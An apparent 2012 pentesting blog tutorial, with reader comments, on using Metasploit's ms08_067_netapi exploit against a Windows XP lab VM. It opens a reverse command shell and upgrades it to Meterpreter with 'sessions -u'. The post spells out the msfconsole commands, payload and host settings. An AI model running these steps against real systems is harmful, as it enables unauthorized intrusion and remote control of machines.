Tuesday, May 1, 2012

Metasploit ~ Upgrade Command Shell into Meterpreter

As I said in my post about meterpreter. It is an advanced payload that can do a lot of advanced task after a system is exploited. But why if we can only get a normal command shell after exploitation? Its rather difficult of course to do the post exploitation step. But that doesn't matter now, because one of the newer features in the Metasploit Framework is its ability to upgrade a command shell payload to a Meterpreter shell payload once the sytem has been exploited. This can be done by issuing "sessions -u <selected session>". This is usefull if we use a command shell payload as an initial stager and then find that this newly exploited system would make the perfect launching pad for further attacks.

Ok, let get started. I'll use a metasploit console version and the system that will be exploited is a Windows XP SP3 machine in my Virtualbox.

- Start your metasploit console
# msfconsole

- Turn on the Windows XP machine
- Ok, like I've posted in this post. I'll use ms08_067_netapi exploit because unpatched windows xp system is very vulnerable to this exploit. 
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/shell_reverse_tcp
msf  exploit(ms08_067_netapi) > set RHOST 192.168.56.2
msf  exploit(ms08_067_netapi) > set LHOST 192.168.56.1

- Run the exploit
msf  exploit(ms08_067_netapi) > exploit -z
By adding "-z" parameter the opened session will be running in background.

- Lets see the opened session.

- Now lets upgrade this command shell into a meterpeter shell. Simply execute this command
msf  exploit(ms08_067_netapi) > sessions -u 1
- Wait until the command stagger progress reach 100%

- And there you are, a new meterpreter session is opened.

- To interact just execute this command
msf  exploit(ms08_067_netapi) > sessions -i 2

Ok, thats it..
again, this show us how powerful and convenience Metasploit Framework is for Pentester.

"the quieter you become, the more you are able to hear.."

6 comments:

Alone said...

Nice Work. Keep it up,

actually this video is also good. I mean i learned lots things about meterpreter. Maybe you like it :)

http://www.securitytube.net/video/2637
HaPPY Hacking

beats by dre cheap said...

Nice Work. Keep it up,

actually this video is also good. I mean i learned lots things about meterpreter.

dragon_master said...

thanks for coming and thanks also for the video links.. :)

sarah lee said...

It is very exciting blog post And picture thanks for the post

interesting Security systems

dragon_master said...

> sarah lee : thanks for coming.. :-)

Unknown said...

Hello I personally got a huge problem well I was getting confortable with meterpreter and i did sessions -u and i got a meterpreter session but now its not working its just doing nothing any suggestions?

Post a Comment